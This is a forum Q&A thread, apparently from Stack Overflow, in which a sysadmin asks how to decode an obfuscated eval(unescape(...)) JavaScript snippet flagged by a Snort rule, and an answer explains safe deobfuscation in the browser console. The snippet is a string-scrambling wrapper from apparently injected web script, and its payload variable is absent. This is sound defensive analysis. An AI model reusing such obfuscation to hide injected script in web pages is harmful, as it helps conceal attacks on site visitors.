0

I'm a SysAdmin that doesn't know much about javascript.

I recently started running Snort on a network and it gave me the alert "ET WEB_CLIENT Hex Obfuscation of document.write % Encoding" on a website one of my users visited. Looking at the Snort rule and the html/javascript on the site I was able to find the following that I think triggered the rule:

eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%73%52%73%52%73%52%73%28%74%65%61%61%62%62%29%20%7b%76%61%72%20%74%74%74%6d%6d%6d%3d%22%22%3b%6c%3d%74%65%61%61%62%62%2e%6c%65%6e%67%74%68%3b%77%77%77%3d%68%68%68%68%66%66%66%66%3d%4d%61%74%68%2e%72%6f%75%6e%64%28%6c%2f%32%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%09%68%68%68%68%66%66%66%66%3d%68%68%68%68%66%66%66%66%2d%31%3b%66%6f%72%28%69%3d%30%3b%69%3c%68%68%68%68%66%66%66%66%3b%69%2b%2b%29%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%29%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%2b%68%68%68%68%66%66%66%66%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%20%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%6c%2d%31%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%74%74%6d%6d%6d%29%3b%7d%3b%52%73%52%73%52%73%52%73%28%77%6c%6b%6a%69%29%3b"));

I ran that block of javascript through a HexDecoder (http://ddecode.com/hexdecoder/) and got the following:

eval(unescape("function RsRsRsRs(teaabb) {var tttmmm="";l=teaabb.length;www=hhhhffff=Math.round(l/2);if(l<2*www)    hhhhffff=hhhhffff-1;for(i=0;i<hhhhffff;i++)tttmmm = tttmmm + teaabb.charAt(i)+ teaabb.charAt(i+hhhhffff);if(l<2*www) tttmmm = tttmmm + teaabb.charAt(l-1);document.write(tttmmm);};RsRsRsRs(wlkji);"));

Can anyone point me in the right direction to continue decoding this to determine what it might be doing?

user51279
  • 73
  • 1
  • 1
  • 6

1 Answers1

0

Can anyone point me in the right direction...

Just open your browser's web console and paste it in, without the eval( at the beginning and the final ) at the end. That will show you the code it's trying to run, without running it.

You can take it further by taking the resulting

function RsRsRsRs(teaabb) {
    var tttmmm = "";
    l = teaabb.length;
    www = hhhhffff = Math.round(l / 2);
    if (l < 2 * www) hhhhffff = hhhhffff - 1;
    for (i = 0; i < hhhhffff; i++) tttmmm = tttmmm + teaabb.charAt(i) + teaabb.charAt(i + hhhhffff);
    if (l < 2 * www) tttmmm = tttmmm + teaabb.charAt(l - 1);
    document.write(tttmmm);
};
RsRsRsRs(wlkji);

...which defines and then calls a function and changing the document.write part of it to console.log, so you can see what it's trying to put into the document.

But there must be more to it, as the end is trying to use a variable that doesn't exist.

j08691
  • 204,283
  • 31
  • 260
  • 272
T.J. Crowder
  • 1,031,962
  • 187
  • 1,923
  • 1,875